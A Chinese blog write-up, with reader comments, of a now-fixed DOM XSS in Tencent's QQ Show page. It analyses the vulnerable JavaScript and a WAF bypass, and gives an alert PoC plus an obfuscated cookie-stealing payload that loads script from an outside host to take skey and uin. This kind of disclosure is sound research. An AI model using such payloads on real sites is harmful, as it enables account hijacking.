QQ某业务主站DOM XSS挖掘与分析(绕过WAF)

腾讯已经修复了,所以我发出来,贵在挖掘与分析过程。

可盗取skey与uin全浏览器通用不会被拦截。

挖掘flashxss的时候偶然发现的,反编译的时候发现这样的URL:

QQ秀DOM XSS挖掘与分析97.png

show.qq.com 属于QQ秀主站业务。

来到show.html,看到如下代码:

var aNUrl= { "M":"http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html", "T":"http://imgcache.qq.com/qqshow_v3/htdocs/inc/header.html", "L":"http://imgcache.qq.com/qqshow_v3/htdocs/inc/sidebar.html" };
var sUrl = QSFL.excore.getURLParam("MUrl").replace(/http:\/\/show.qq.com/,"http://imgcache.qq.com/qqshow_v3/htdocs");
(sUrl && CheckUrlCredit4Frames(sUrl)) && (aNUrl["M"]=Rel2Abs(sUrl));
var sUrl = QSFL.excore.getURLParam("LUrl");
(sUrl && CheckUrlCredit4Frames(sUrl)) && (aNUrl["L"]=Rel2Abs(sUrl));
var sUrl = QSFL.excore.getURLParam("TUrl");
(sUrl && CheckUrlCredit4Frames(sUrl)) && (aNUrl["T"]=Rel2Abs(sUrl));
...
...
var uPrm = window.location.href.split("?"); // 从location.href中获得uPrm
var _Prm = new QSFL.excore.param(uPrm[1] || "", "&", "="); // 获得GET参数
for (var xName in _Prm)
{
    if (typeof(_Prm[xName])=="string" && xName!="MUrl" && xName!="LUrl" && xName!="TUrl")  // xName是键,_Prm[xName]是值
    {
        aNUrl["M"] = QSFL.excore.setURLParam(aNUrl["M"], xName, _Prm[xName]);
        aNUrl["L"] = QSFL.excore.setURLParam(aNUrl["L"], xName, _Prm[xName]);
        aNUrl["T"] = QSFL.excore.setURLParam(aNUrl["T"], xName, _Prm[xName]);
    }
...
...
QSFL.$("headerFrame").src = aNUrl["T"];
QSFL.$("sideFrame").src = aNUrl["L"];
QSFL.$("mainFrame").src = aNUrl["M"];

上面这三句,很明显是可能会存在xss的。QSFL.$("headerFrame")是一个iframe对象,它的src属性可以为javascript协议,也就是:<iframe src=javascript:alert(1)>。所以只要能控制aNUrl["T"];的前部分,就能造成一个无需交互的DOM XSS。

要控制aNUrl["T"],看看之前QSFL.excore.setURLParam函数。QSFL.excore.setURLParam的第一个参数是预置的 http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.htmlhttp://imgcache.qq.com/qqshow_v3/htdocs/inc/header.htmlhttp://imgcache.qq.com/qqshow_v3/htdocs/inc/sidebar.html ,第二、三个参数是GET的键和值。

进入QSFL.excore.setURLParam看看。

QSFL.excore.setURLParam = function(sUrl, sName, sValue) 
{
    sUrl = sUrl.toString();
    sName = sName.toString();
    sValue = sValue.toString().escUrl();
    var r = new RegExp("(^|\\W)" + sName + "=[^&]*", "g");
    var vUrl = sUrl.split("#");
    vUrl[0] = (vUrl[0].match(r)) ? vUrl[0].replace(r, "$1" + sName + "=" + sValue) : vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + sName + "=" 
    + sValue;
    return vUrl.join("#");
};

我们先缕缕思路,这个函数的三个参数,sUrl是我们不能控制的,但sName、sValue都是可以控制的,但其中不能包含&、=。

我们看到主要部分是一个?:选择符。如果能执行vUrl[0].replace(r, "$1" + sName + "=" + sValue),因为sName我们可以控制,所以就能控制url的前半部分;如果执行的是vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + sName + "=" + sValue;,vUrl[0]就是sUrl,我们不能控制前半部分,所以不行。

所以看看怎样让这个三目运算符执行第一个。看到这个正则:RegExp("(^|\\W)" + sName + "=[^&]*", "g");。将sName放入正则表达式了。

只要让vUrl[0]匹配上这个正则就可以了,想想怎么办?

让sName中包含或|就可以了,即为|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|,则整个正则为(^|\\W)|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=[^&]*,肯定是可以匹配上 http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html 的。

我们再在sName前面加上javascript:alert(1)//,最后返回的URL即为javascript:alert(1)//|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=1,这样的URL放入iframe的src属性中即可造成一个XSS。
实际上我发现服务器WAF将会过滤一些关键字,比如javascript:、”等,javascript可以用大小写绕过,引号完全可以不需要,我们可以用//.source代替。

给出一个POC:

http://show.qq.com/show.html?javAScripT:alert(1)//|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=1

可见弹窗:

QQ秀DOM XSS挖掘与分析3380.png

写一个盗取cookie的EXP:

http://show.qq.com/show.html?javAScripT:eval(atob(/ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPWh0dHA6Ly94NTUubWh6LnB3L0hZYkJ3VT48L3NjcmlwdD4nKTs/.source))//|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=1

这个能在chrome下运行。

经测试可以盗取skey、uin,有这两个就可以登他人空间,干很多邪恶的事情:

QQ秀DOM XSS挖掘与分析3883.png

赞赏

喜欢这篇文章,扫码和我成为赞友!

评论

lufei 回复

引号完全可以不需要,我们可以用//.source代替。 能详细解释下吗? 到网上搜了几下没搜到 。。

phithon 回复

@lufei://在javascript里是正则对象,.source获取其字符串。

呵呵 回复

楼主可牛了....

谷粉综合搜索 回复

有时加这么多QQ号感觉也没太多用。

captcha